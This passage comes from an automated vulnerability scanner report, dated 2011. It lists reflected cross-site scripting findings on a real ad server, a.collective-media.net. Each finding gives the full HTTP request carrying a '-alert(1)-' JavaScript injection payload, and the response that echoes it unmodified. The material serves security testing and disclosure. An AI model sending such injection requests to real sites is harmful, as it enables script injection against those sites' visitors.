This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/bzo.454.61DCBAA1/_default;sz=728x90;ord=1316294704606?f443e'-alert(1)-'c92a6f31e27 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 463
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:25:20 GMT
Connection: close
Set-Cookie: dc=sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:25:20 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/bzo.454.61DCBAA1/_default;sz=728x90;net=bzo;ord=1316294704606?f443e'-alert(1)-'c92a6f31e27;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.5. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/be_home [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.q.seattlepostintelligencer/be_home

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9830'-alert(1)-'06f66f21338 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.q.seattlepostintelligencerd9830'-alert(1)-'06f66f21338/be_home;sz=300x250;ord=3896159382? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 471
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:48:03 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:48:03 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencerd9830'-alert(1)-'06f66f21338/be_home;sz=300x250;net=q1;ord=3896159382;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.6. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/be_home [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.q.seattlepostintelligencer/be_home

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1f33'-alert(1)-'01a9ecf3769 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.q.seattlepostintelligencer/be_homea1f33'-alert(1)-'01a9ecf3769;sz=300x250;ord=3896159382? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 471
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:48:03 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:48:03 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/be_homea1f33'-alert(1)-'01a9ecf3769;sz=300x250;net=q1;ord=3896159382;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.7. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/be_home [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.q.seattlepostintelligencer/be_home

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a9e3'-alert(1)-'d66700f8150 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.q.seattlepostintelligencer/be_home;sz=300x250;ord=3896159382?&5a9e3'-alert(1)-'d66700f8150=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 475
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:48:01 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:48:01 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/be_home;sz=300x250;net=q1;ord=3896159382?&5a9e3'-alert(1)-'d66700f8150=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.8. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/be_home [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.q.seattlepostintelligencer/be_home

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e932'-alert(1)-'30f90c72958 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.q.seattlepostintelligencer/be_home;sz=300x250;ord=3896159382?1e932'-alert(1)-'30f90c72958 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 472
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:47:59 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E90af58da516cc31cbb50b4a; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:47:59 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/be_home;sz=300x250;net=q1;ord=3896159382?1e932'-alert(1)-'30f90c72958;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.9. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/home [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.q.seattlepostintelligencer/home

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35275'-alert(1)-'d0849d7af27 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.q.seattlepostintelligencer35275'-alert(1)-'d0849d7af27/home;sz=728x90;ord=3639010052? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 467
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:49:29 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:49:29 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer35275'-alert(1)-'d0849d7af27/home;sz=728x90;net=q1;ord=3639010052;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.10. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/home [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.q.seattlepostintelligencer/home

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7cec5'-alert(1)-'2bc5f5d3ce8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.q.seattlepostintelligencer/home7cec5'-alert(1)-'2bc5f5d3ce8;sz=728x90;ord=3639010052? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 467
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:49:30 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:49:30 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/home7cec5'-alert(1)-'2bc5f5d3ce8;sz=728x90;net=q1;ord=3639010052;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.11. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/home [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.q.seattlepostintelligencer/home

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f507c'-alert(1)-'0cce3655674 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.q.seattlepostintelligencer/home;sz=728x90;ord=3639010052?&f507c'-alert(1)-'0cce3655674=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 471
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:49:28 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:49:28 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/home;sz=728x90;net=q1;ord=3639010052?&f507c'-alert(1)-'0cce3655674=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.12. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/home [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.q.seattlepostintelligencer/home

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d6c0'-alert(1)-'5ac724d3334 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.q.seattlepostintelligencer/home;sz=728x90;ord=3639010052?2d6c0'-alert(1)-'5ac724d3334 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 468
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:49:26 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E90af58da731901b84ed373b8; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:49:26 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/home;sz=728x90;net=q1;ord=3639010052?2d6c0'-alert(1)-'5ac724d3334;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.13. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/qo [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.q.seattlepostintelligencer/qo

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42243'-alert(1)-'0157ffe4a1a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.q.seattlepostintelligencer42243'-alert(1)-'0157ffe4a1a/qo;sz=300x250;ord=[timestamp]? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 467
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:23:43 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:23:43 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer42243'-alert(1)-'0157ffe4a1a/qo;sz=300x250;net=q1;ord=[timestamp];'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.14. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/qo [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.q.seattlepostintelligencer/qo

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4364f'-alert(1)-'1be745942f1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.q.seattlepostintelligencer/qo4364f'-alert(1)-'1be745942f1;sz=300x250;ord=[timestamp]? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 467
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:23:44 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:23:44 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/qo4364f'-alert(1)-'1be745942f1;sz=300x250;net=q1;ord=[timestamp];'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.15. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/qo [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.q.seattlepostintelligencer/qo

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f44b9'-alert(1)-'d4036993b4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.q.seattlepostintelligencer/qo;sz=300x250;ord=[timestamp]?&f44b9'-alert(1)-'d4036993b4b=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 471
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:23:41 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:23:41 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/qo;sz=300x250;net=q1;ord=[timestamp]?&f44b9'-alert(1)-'d4036993b4b=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.16. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/qo [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.q.seattlepostintelligencer/qo

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7365'-alert(1)-'5ffed8dc568 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.q.seattlepostintelligencer/qo;sz=300x250;ord=[timestamp]?c7365'-alert(1)-'5ffed8dc568 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 468
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:23:40 GMT
Connection: close
Set-Cookie: dc=sea-dc90af58da95785a528f279adf; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:23:40 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/qo;sz=300x250;net=q1;ord=[timestamp]?c7365'-alert(1)-'5ffed8dc568;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.17. http://a.collective-media.net/cmadj/bzo.454.61DCBAA1/_default [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/bzo.454.61DCBAA1/_default

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aac19'-alert(1)-'6ed63ccc02d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadjaac19'-alert(1)-'6ed63ccc02d/bzo.454.61DCBAA1/_default;sz=728x90;net=bzo;ord=1316294704606;ord1=364732;cmpgurl=http%253A//www.seattlepi.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
